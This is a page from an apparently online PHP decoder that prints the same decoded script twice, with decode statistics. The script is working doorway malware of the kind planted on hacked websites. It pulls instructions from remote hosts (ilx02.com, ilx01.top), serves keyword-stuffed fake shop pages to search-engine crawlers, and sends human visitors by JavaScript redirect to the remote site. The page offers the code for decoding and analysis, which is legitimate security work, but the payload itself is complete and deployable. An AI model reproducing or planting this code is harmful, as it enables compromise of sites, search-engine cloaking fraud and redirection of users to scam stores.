Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); $http_type = ((isset($_SERVER['HTTP..
Decoded Output download
<?php
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$kname = "";
$kgurl="https://ilx02.com/10.txt";
$kgurl2="http://ilx01.top/jb10.txt";
$allurl =file_get_contents($kgurl);
if(!$allurl){$allurl=file_get_contents($kgurl2);}
$words = explode("|", $allurl);
foreach ($words as $value){
$aaa =file_get_contents($value.'test.txt');if(!$aaa){continue;}else{$jd=$value;break; }}
if (!is_null($_GET['shop'])) {
$kname = $_GET['shop'];
}
if (!is_null($_GET['s'])) {
$cid = mt_rand(1, 80);
if (!is_null($_GET['cid'])) {
$cid = $_GET['cid'];
}
$url = $jd . "sname.aspx?cid=" . $cid . "&number=" . $_GET['number'] . "&pnum=" . $_GET['pnum'];
$str = file_get_contents($url);
$str = str_replace('yymm', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('cname', 'shop', $str);
header("Content-type:text/xml");
echo $str;
exit();
}
function check($ip)
{
global $jd;
if (!is_null($_GET['kk'])) {
$ip = "66.249.64.190";
}
$domain = file_get_contents($jd . "getdomain.aspx?rnd=1&ip=" . $ip);
if (stripos($domain, 'google') != false or stripos($domain, 'msn.com') != false or stripos($domain, 'yahoo.com') != false or stripos($domain, 'aol.com') != false) {
} else {
if (!is_null($_GET['shop'])) {
$kname = $_GET['shop'];
$xs = $jd . "a.aspx";
echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>';
exit();
}
if (!is_null($_GET['iid'])) {
$kname = $_GET['kname'];
$xs = $jd . "a.aspx";
echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>';
exit();
}
if (!is_null($_GET['pnum'])) {
$xs = $jd . "a.aspx";
$txt = str_replace("products.aspx", "", $xs) . "?cid=" . $_GET['cid'];
echo '<script>document.location="' . $txt . '"</script>';
exit();
}
}
}
function getIP()
{
$ip = $_SERVER['REMOTE_ADDR'] . "*" . $_SERVER['REMOTE_HOST'] . "*" . $_SERVER['HTTP_CLIENT_IP'] . "*" . $_SERVER['HTTP_X_FORWARDED'] . "*" . $_SERVER['HTTP_FORWARDED_FOR'] . "*" . $_SERVER['HTTP_FORWARDED'];
return $ip;
}
$validate = check(getIP());
?>
<?php
$url = "";
$hyzhdy = $jd . "jd_lb.aspx";
if (!is_null($_GET['shop'])) {
$kname = $_GET['shop'];
$url = $hyzhdy . "?cname=" . urlencode($_GET['shop']) . "&cid=" . $_GET['cid'];
}
else if (!is_null($_GET['iid'])) {
$kname = $_GET['kname'];
$wid = mt_rand(1, 1500);
$url = $hyzhdy . "?iid=". $_GET['iid']."&cname=" . urlencode($_GET['kname']) . "&cid=" . $_GET['cid'] . "&mt=" . $jd . "enm/" . $wid . ".txt" . "&yt=" . $jd . "ytbs.txt&you=1";
} else {
$cid = mt_rand(1, 80);
if (!is_null($_GET['cid'])) {
$cid = $_GET['cid'];
}
$url = $hyzhdy . "?cid=" . $cid . "&pnum=" . $_GET['pnum'];
}
$ttttt = $kname . " online sales,Up To " . "OFF" . mt_rand(50, 70) . "% |" . $_GET['pnum'];
$kkkkk = $kname;
$iiiii = $kname . " There's a handful of major online auction and sales sites, and as you'll see, some charge much lower fees than others. ";
$ccccc = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
$str = file_get_contents($url);
$str = str_replace('UUUUU', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('HHHHH', $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('BBBBB', $_SERVER['HTTP_HOST'], $str);
$str = str_replace('NNNNN', $kname, $str);
$str = str_replace('DDDDD', $kname . " Gold, White, Black, Red, Blue, Beige, Grey, Price, Rose, Orange, Purple, Green, Yellow, Cyan, Bordeaux, pink, Indigo, Brown, Silver,Electronics, Video Games, Computers, Cell Phones, Toys, Games, Apparel, Accessories, Shoes, Jewelry, Watches, Office Products, Sports & Outdoors, Sporting Goods, Baby Products, Health, Personal Care, Beauty, Home, Garden, Bed & Bath, Furniture, Tools, Hardware, Vacuums, Outdoor Living, Automotive Parts, Pet Supplies, Broadband, DSL, Books, Book Store, Magazine, Subscription, Music, CDs, DVDs, Videos,Online Shopping.Fast delivery and guaranteed savings! " . $_GET['searchtxt'], $str);
$str = str_replace('TTTTT', $ttttt, $str);
$str = str_replace('KKKKK', $kkkkk, $str);
$str = str_replace('IIIII', $iiiii, $str);
$str = str_replace('CCCCC', $ccccc, $str);
$str = str_replace('cname', 'shop', $str);
echo $str;
?>
Did this file decode correctly?
Original Code
<?php
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$kname = "";
$kgurl="https://ilx02.com/10.txt";
$kgurl2="http://ilx01.top/jb10.txt";
$allurl =file_get_contents($kgurl);
if(!$allurl){$allurl=file_get_contents($kgurl2);}
$words = explode("|", $allurl);
foreach ($words as $value){
$aaa =file_get_contents($value.'test.txt');if(!$aaa){continue;}else{$jd=$value;break; }}
if (!is_null($_GET['shop'])) {
$kname = $_GET['shop'];
}
if (!is_null($_GET['s'])) {
$cid = mt_rand(1, 80);
if (!is_null($_GET['cid'])) {
$cid = $_GET['cid'];
}
$url = $jd . "sname.aspx?cid=" . $cid . "&number=" . $_GET['number'] . "&pnum=" . $_GET['pnum'];
$str = file_get_contents($url);
$str = str_replace('yymm', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('cname', 'shop', $str);
header("Content-type:text/xml");
echo $str;
exit();
}
function check($ip)
{
global $jd;
if (!is_null($_GET['kk'])) {
$ip = "66.249.64.190";
}
$domain = file_get_contents($jd . "getdomain.aspx?rnd=1&ip=" . $ip);
if (stripos($domain, 'google') != false or stripos($domain, 'msn.com') != false or stripos($domain, 'yahoo.com') != false or stripos($domain, 'aol.com') != false) {
} else {
if (!is_null($_GET['shop'])) {
$kname = $_GET['shop'];
$xs = $jd . "a.aspx";
echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>';
exit();
}
if (!is_null($_GET['iid'])) {
$kname = $_GET['kname'];
$xs = $jd . "a.aspx";
echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>';
exit();
}
if (!is_null($_GET['pnum'])) {
$xs = $jd . "a.aspx";
$txt = str_replace("products.aspx", "", $xs) . "?cid=" . $_GET['cid'];
echo '<script>document.location="' . $txt . '"</script>';
exit();
}
}
}
function getIP()
{
$ip = $_SERVER['REMOTE_ADDR'] . "*" . $_SERVER['REMOTE_HOST'] . "*" . $_SERVER['HTTP_CLIENT_IP'] . "*" . $_SERVER['HTTP_X_FORWARDED'] . "*" . $_SERVER['HTTP_FORWARDED_FOR'] . "*" . $_SERVER['HTTP_FORWARDED'];
return $ip;
}
$validate = check(getIP());
?>
<?php
$url = "";
$hyzhdy = $jd . "jd_lb.aspx";
if (!is_null($_GET['shop'])) {
$kname = $_GET['shop'];
$url = $hyzhdy . "?cname=" . urlencode($_GET['shop']) . "&cid=" . $_GET['cid'];
}
else if (!is_null($_GET['iid'])) {
$kname = $_GET['kname'];
$wid = mt_rand(1, 1500);
$url = $hyzhdy . "?iid=". $_GET['iid']."&cname=" . urlencode($_GET['kname']) . "&cid=" . $_GET['cid'] . "&mt=" . $jd . "enm/" . $wid . ".txt" . "&yt=" . $jd . "ytbs.txt&you=1";
} else {
$cid = mt_rand(1, 80);
if (!is_null($_GET['cid'])) {
$cid = $_GET['cid'];
}
$url = $hyzhdy . "?cid=" . $cid . "&pnum=" . $_GET['pnum'];
}
$ttttt = $kname . " online sales,Up To " . "OFF" . mt_rand(50, 70) . "% |" . $_GET['pnum'];
$kkkkk = $kname;
$iiiii = $kname . " There's a handful of major online auction and sales sites, and as you'll see, some charge much lower fees than others. ";
$ccccc = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
$str = file_get_contents($url);
$str = str_replace('UUUUU', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('HHHHH', $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('BBBBB', $_SERVER['HTTP_HOST'], $str);
$str = str_replace('NNNNN', $kname, $str);
$str = str_replace('DDDDD', $kname . " Gold, White, Black, Red, Blue, Beige, Grey, Price, Rose, Orange, Purple, Green, Yellow, Cyan, Bordeaux, pink, Indigo, Brown, Silver,Electronics, Video Games, Computers, Cell Phones, Toys, Games, Apparel, Accessories, Shoes, Jewelry, Watches, Office Products, Sports & Outdoors, Sporting Goods, Baby Products, Health, Personal Care, Beauty, Home, Garden, Bed & Bath, Furniture, Tools, Hardware, Vacuums, Outdoor Living, Automotive Parts, Pet Supplies, Broadband, DSL, Books, Book Store, Magazine, Subscription, Music, CDs, DVDs, Videos,Online Shopping.Fast delivery and guaranteed savings! " . $_GET['searchtxt'], $str);
$str = str_replace('TTTTT', $ttttt, $str);
$str = str_replace('KKKKK', $kkkkk, $str);
$str = str_replace('IIIII', $iiiii, $str);
$str = str_replace('CCCCC', $ccccc, $str);
$str = str_replace('cname', 'shop', $str);
echo $str;
?>
Function Calls
None |
Stats
MD5 | c425321dfe912327ffbbb8b6fe54e5d8 |
Eval Count | 0 |
Decode Time | 59 ms |